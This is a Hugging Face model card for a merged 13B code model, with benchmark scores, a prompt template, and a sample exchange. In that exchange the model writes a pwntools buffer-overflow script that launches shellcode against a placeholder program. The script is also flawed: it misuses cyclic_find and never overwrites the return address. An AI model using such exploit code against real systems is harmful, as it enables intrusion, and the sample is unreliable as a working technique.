---
license: llama2
tags:
- moe
- merge
base_model: codellama/CodeLlama-13b-Instruct-hf
model-index:
- name: Winged-Lagomorph-2x13B
  results:
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: AI2 Reasoning Challenge (25-Shot)
      type: ai2_arc
      config: ARC-Challenge
      split: test
      args:
        num_few_shot: 25
    metrics:
    - type: acc_norm
      value: 47.95
      name: normalized accuracy
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: HellaSwag (10-Shot)
      type: hellaswag
      split: validation
      args:
        num_few_shot: 10
    metrics:
    - type: acc_norm
      value: 69.39
      name: normalized accuracy
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: MMLU (5-Shot)
      type: cais/mmlu
      config: all
      split: test
      args:
        num_few_shot: 5
    metrics:
    - type: acc
      value: 44.5
      name: accuracy
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: TruthfulQA (0-shot)
      type: truthful_qa
      config: multiple_choice
      split: validation
      args:
        num_few_shot: 0
    metrics:
    - type: mc2
      value: 44.54
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: Winogrande (5-shot)
      type: winogrande
      config: winogrande_xl
      split: validation
      args:
        num_few_shot: 5
    metrics:
    - type: acc
      value: 67.4
      name: accuracy
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
  - task:
      type: text-generation
      name: Text Generation
    dataset:
      name: GSM8k (5-shot)
      type: gsm8k
      config: main
      split: test
      args:
        num_few_shot: 5
    metrics:
    - type: acc
      value: 25.63
      name: accuracy
    source:
      url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
      name: Open LLM Leaderboard
---
Grafted WhiteRabbitNeo-13B-v1 and NexusRaven-V2-13B with mergekit. Use the WhiteRabbitNeo prompt template for regular code and the NexusRaven template for function calling.
<img src="https://huggingface.co/lodrick-the-lafted/Winged-Lagomorph-2x13B/resolve/main/winged-lago.png">
SYSTEM: Answer the Question by exploring multiple reasoning paths as follows:
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.
USER: Write a pwntools script that overflows a 64 character buffer from stdin.
ASSISTANT: To write a pwntools script that overflows a 64-character buffer from stdin, we need to follow these steps:
1. **Identify the vulnerable program**: Find the program that has a buffer overflow vulnerability. This can be done by analyzing the program's source code or by using tools like `gdb` or `valgrind`.
2. **Set up the environment**: Install pwntools and any other necessary dependencies.
3. **Create a pwntools script**: Start by importing the `pwn` module and setting up the connection to the vulnerable program.
4. **Find the offset**: Use the `cyclic` function from pwntools to generate a pattern that will help us find the offset.
5. **Overflow the buffer**: Send the generated pattern to the vulnerable program, and then send additional data to overwrite the return address on the stack.
6. **Control the execution flow**: Overwrite the return address with the address of a shellcode or a function that will give us a shell.
7. **Execute the script**: Run the script and observe the results.
Here's an example pwntools script that overflows a 64-character buffer:
```python
from pwn import *
# Set up the connection to the vulnerable program
p = process('./vulnerable_program')
# Find the offset using cyclic
offset = cyclic_find(b'A'*64)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Overflow the buffer
payload = b'A' * offset + shellcode
p.sendline(payload)
# Execute the script
p.interactive()
```
In this example, `vulnerable_program` is the name of the vulnerable program, and `shellcraft.sh()` is a function from pwntools that generates shellcode for a Linux/x86-64 system. The `cyclic_find` function is used to find the offset at which the buffer overflow occurs.
Please note that this script is a basic example and may not work in all cases. It's important to tailor the script to the specific vulnerability and environment you are working with.
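The exchange above follows a SYSTEM / USER / ASSISTANT layout. As a rough sketch of how such a prompt could be assembled before it is passed to the model, the helper below joins the three parts. The function name `build_prompt` and the single-newline separators are assumptions made for illustration; check the WhiteRabbitNeo model card for the exact template before relying on this.

```python
def build_prompt(system: str, user: str) -> str:
    """Assemble a SYSTEM/USER/ASSISTANT prompt like the sample above.

    Hypothetical helper: the newline separators are an assumption,
    not a confirmed part of the WhiteRabbitNeo template.
    """
    return f"SYSTEM: {system.strip()}\nUSER: {user.strip()}\nASSISTANT:"


prompt = build_prompt(
    "Answer the Question by exploring multiple reasoning paths.",
    "Write a pwntools script that overflows a 64 character buffer from stdin.",
)
print(prompt)
```

The string ends with `ASSISTANT:` so that the model continues from the assistant turn.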
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_lodrick-the-lafted__Winged-Lagomorph-2x13B).
| Metric |Value|
|---------------------------------|----:|
|Avg. |49.90|
|AI2 Reasoning Challenge (25-Shot)|47.95|
|HellaSwag (10-Shot) |69.39|
|MMLU (5-Shot) |44.50|
|TruthfulQA (0-shot) |44.54|
|Winogrande (5-shot) |67.40|
|GSM8k (5-shot) |25.63|
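
The Avg. row is consistent with the plain arithmetic mean of the six benchmark scores. A short check, using only the values from the table (the `scores` dictionary is just an illustrative container):

```python
# Scores copied from the table above.
scores = {
    "AI2 Reasoning Challenge (25-Shot)": 47.95,
    "HellaSwag (10-Shot)": 69.39,
    "MMLU (5-Shot)": 44.50,
    "TruthfulQA (0-shot)": 44.54,
    "Winogrande (5-shot)": 67.40,
    "GSM8k (5-shot)": 25.63,
}

# Unweighted mean across the six benchmarks.
average = sum(scores.values()) / len(scores)
print(f"{average:.2f}")  # 49.90
```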